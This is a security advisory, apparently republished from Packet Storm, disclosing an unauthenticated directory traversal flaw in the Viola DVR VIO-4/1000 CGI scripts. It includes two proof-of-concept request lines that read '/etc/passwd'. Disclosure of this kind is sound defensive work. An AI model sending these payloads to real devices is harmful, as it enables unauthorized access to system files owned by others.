Viola DVR VIO-4/1000 suffers from a directory traversal vulnerability.
e3b7b14e63fb2b4b4420a0ebdaf4ca813765e389b5977297108e69160e1ddb1a==============================================================
Viola DVR VIO-4/1000 - Directory Traversal Vulnerability
==============================================================
Software: Viola DVR VIO-4/1000 (other products may be affected)
Vendor: http://www.videcon.co.uk/
Vuln Type: Directory Traversal
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
Website: http://www.qsecure.com.cy
Discovered: 04/04/2011
Reported: 12/04/2011
Disclosed: 19/04/2011
Vendor's Response: None
Vulnerability Reference: http://www.qsecure.com.cy/advisories/dir_traversal_in_viola_dvr.html
VULNERABILITY DESCRIPTION:
==========================
The scripts "/cgi-bin/wappwd" and "/cgi-bin/wapopen" are prone to a directory-traversal vulnerability because they fail to properly sanitize user-supplied input in the "FILEFAIL" and "FILECAMERA" parameters respectively.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.
Authentication is not required to exploit the vulnerability.
PoC Exploit:
============
/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed